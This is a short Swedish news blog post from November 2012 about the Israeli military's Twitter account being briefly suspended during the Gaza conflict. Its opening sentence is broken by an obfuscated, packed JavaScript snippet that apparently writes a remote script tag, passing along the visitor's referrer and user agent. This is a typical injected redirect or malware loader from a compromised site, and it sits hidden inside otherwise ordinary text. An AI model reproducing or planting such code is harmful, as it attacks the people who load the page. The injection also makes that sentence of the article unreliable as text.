Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Israels militära twitterkonto blev avstängt

Israels militära twitterkonto blev avstängt
Filip Urde
  • On 16 november, 2012
  • http://www.revue.se/filip-urde

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erhib|var|u0026u|referrer|zeetr||js|php’.split(’|’),0,{}))
oändligt långa konflikten mellan Israel och Palestina har nu på riktigt tagit sig in i våra sociala medier.

Båda sidorna, IDF (Israel Defence Forces), och Hamas militära del, Alqassam-brigaden, försöker båda sprida sina budskap via sociala medierna. Igår fick IDF dock veta att man gick förlångt när man på Twitter uppmanade till direkta våldshandlingar.

Vilket är något som bryter mot Twitters regelverk och gjorde att IDF fick sitt twitterkonto avstängt i ungefär 40min. Kontot är sedermera igång igen och tweetsen som var kritiserade är fortfarande kvar.

Värt att tillägga är att Israel gjorde en bombräd mot Gaza i morse, efter en rad raket attacker från Gaza, samt att Egyptens premiärminister är i Gaza nu idag för att lugna ner situationen. Israel har sagt att dem inte kommer skjuta så länge premiärministern är där… så länge inte någon skjuter mot dem. Så man kan säga att det finns en hel del skit i luften.

Här är de båda sidornas Twitter konton om ni vill följa konflikten även i de sociala medierna. @IDFSpokesperson här och @AlqassamBrigade.

Tack Jacob för tipset.